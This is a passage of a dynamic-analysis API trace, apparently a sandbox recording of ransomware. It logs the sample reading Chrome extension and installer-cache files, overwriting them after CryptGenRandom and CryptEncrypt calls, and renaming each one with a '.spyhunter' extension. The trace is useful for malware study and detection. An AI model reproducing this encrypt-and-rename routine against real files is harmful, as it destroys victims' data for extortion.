hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f210*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f210*=0x30) returned 1 [0136.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.630] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0136.630] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0136.631] GetProcessHeap () returned 0x2c0000 [0136.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.631] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1d4*=0x5c, lpOverlapped=0x0) returned 1 [0136.632] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.632] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x270f1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1d4*=0x5c, lpOverlapped=0x0) returned 1 [0136.632] GetProcessHeap () returned 0x2c0000 [0136.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.632] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.632] WriteFile (in: hFile=0x18c, lpBuffer=0x270f214*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1d4, lpOverlapped=0x0 | out: lpBuffer=0x270f214*, lpNumberOfBytesWritten=0x270f1d4*=0x4, lpOverlapped=0x0) returned 1 [0136.664] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1d4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1d4*=0x30, lpOverlapped=0x0) returned 1 [0136.664] CloseHandle (hObject=0x18c) returned 1 [0136.664] GetProcessHeap () returned 0x2c0000 [0136.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.664] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.spyhunter") returned 149 [0136.664] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.spyhunter")) returned 1 [0136.665] GetProcessHeap () returned 0x2c0000 [0136.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.665] GetProcessHeap () returned 0x2c0000 [0136.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.666] GetProcessHeap () returned 0x2c0000 [0136.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0f3f8 | out: hHeap=0x2c0000) returned 1 [0136.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f210 | out: pbBuffer=0x270f210) returned 1 [0136.667] GetProcessHeap () returned 0x2c0000 [0136.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.667] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f208*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f208*=0x30) returned 1 [0136.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.680] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0136.680] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.680] GetProcessHeap () returned 0x2c0000 [0136.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.680] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f1cc*=0xbf, lpOverlapped=0x0) returned 1 [0136.681] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.681] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xbf, lpNumberOfBytesWritten=0x270f1cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f1cc*=0xbf, lpOverlapped=0x0) returned 1 [0136.682] GetProcessHeap () returned 0x2c0000 [0136.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.682] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.682] WriteFile (in: hFile=0x188, lpBuffer=0x270f20c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1cc, lpOverlapped=0x0 | out: lpBuffer=0x270f20c*, lpNumberOfBytesWritten=0x270f1cc*=0x4, lpOverlapped=0x0) returned 1 [0136.682] WriteFile (in: hFile=0x188, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1cc*=0x30, lpOverlapped=0x0) returned 1 [0136.682] CloseHandle (hObject=0x188) returned 1 [0136.682] GetProcessHeap () returned 0x2c0000 [0136.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.683] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.spyhunter") returned 165 [0136.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.spyhunter")) returned 1 [0136.683] GetProcessHeap () returned 0x2c0000 [0136.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.684] GetProcessHeap () returned 0x2c0000 [0136.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.684] GetProcessHeap () returned 0x2c0000 [0136.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e7c0 | out: hHeap=0x2c0000) returned 1 [0136.685] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f208 | out: pbBuffer=0x270f208) returned 1 [0136.685] GetProcessHeap () returned 0x2c0000 [0136.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.685] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f200*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f200*=0x30) returned 1 [0136.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0136.696] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.696] GetProcessHeap () returned 0x2c0000 [0136.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.696] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1c4*=0xd5, lpOverlapped=0x0) returned 1 [0136.697] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.697] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x270f1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1c4*=0xd5, lpOverlapped=0x0) returned 1 [0136.697] GetProcessHeap () returned 0x2c0000 [0136.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.698] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.698] WriteFile (in: hFile=0x180, lpBuffer=0x270f204*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1c4, lpOverlapped=0x0 | out: lpBuffer=0x270f204*, lpNumberOfBytesWritten=0x270f1c4*=0x4, lpOverlapped=0x0) returned 1 [0136.698] WriteFile (in: hFile=0x180, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1c4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1c4*=0x30, lpOverlapped=0x0) returned 1 [0136.698] CloseHandle (hObject=0x180) returned 1 [0136.698] GetProcessHeap () returned 0x2c0000 [0136.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.698] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 168 [0136.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0136.699] GetProcessHeap () returned 0x2c0000 [0136.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.699] GetProcessHeap () returned 0x2c0000 [0136.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.699] GetProcessHeap () returned 0x2c0000 [0136.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6cf40 | out: hHeap=0x2c0000) returned 1 [0136.701] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f200 | out: pbBuffer=0x270f200) returned 1 [0136.701] GetProcessHeap () returned 0x2c0000 [0136.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.701] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f1f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f1f8*=0x30) returned 1 [0136.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.701] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0136.701] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.702] GetProcessHeap () returned 0x2c0000 [0136.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.702] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1bc*=0xe6, lpOverlapped=0x0) returned 1 [0136.703] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.703] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x270f1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1bc*=0xe6, lpOverlapped=0x0) returned 1 [0136.703] GetProcessHeap () returned 0x2c0000 [0136.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.703] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.703] WriteFile (in: hFile=0x180, lpBuffer=0x270f1fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1bc, lpOverlapped=0x0 | out: lpBuffer=0x270f1fc*, lpNumberOfBytesWritten=0x270f1bc*=0x4, lpOverlapped=0x0) returned 1 [0136.703] WriteFile (in: hFile=0x180, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1bc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1bc*=0x30, lpOverlapped=0x0) returned 1 [0136.703] CloseHandle (hObject=0x180) returned 1 [0136.703] GetProcessHeap () returned 0x2c0000 [0136.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.704] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 168 [0136.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0136.704] GetProcessHeap () returned 0x2c0000 [0136.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.705] GetProcessHeap () returned 0x2c0000 [0136.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.705] GetProcessHeap () returned 0x2c0000 [0136.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e7c0 | out: hHeap=0x2c0000) returned 1 [0136.706] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1f8 | out: pbBuffer=0x270f1f8) returned 1 [0136.706] GetProcessHeap () returned 0x2c0000 [0136.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.706] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f1f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f1f0*=0x30) returned 1 [0136.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0136.707] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.707] GetProcessHeap () returned 0x2c0000 [0136.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.707] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1b4*=0xd1, lpOverlapped=0x0) returned 1 [0136.708] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.708] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1b4*=0xd1, lpOverlapped=0x0) returned 1 [0136.708] GetProcessHeap () returned 0x2c0000 [0136.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.709] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.709] WriteFile (in: hFile=0x180, lpBuffer=0x270f1f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x270f1f4*, lpNumberOfBytesWritten=0x270f1b4*=0x4, lpOverlapped=0x0) returned 1 [0136.709] WriteFile (in: hFile=0x180, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1b4*=0x30, lpOverlapped=0x0) returned 1 [0136.709] CloseHandle (hObject=0x180) returned 1 [0136.709] GetProcessHeap () returned 0x2c0000 [0136.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.709] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.spyhunter") returned 165 [0136.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0136.710] GetProcessHeap () returned 0x2c0000 [0136.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.710] GetProcessHeap () returned 0x2c0000 [0136.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.710] GetProcessHeap () returned 0x2c0000 [0136.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0136.711] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1f8 | out: pbBuffer=0x270f1f8) returned 1 [0136.711] GetProcessHeap () returned 0x2c0000 [0136.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.711] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f1f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f1f0*=0x30) returned 1 [0136.711] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.721] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0136.722] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0136.722] GetProcessHeap () returned 0x2c0000 [0136.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.722] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f1b4*=0x2800, lpOverlapped=0x0) returned 1 [0136.790] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 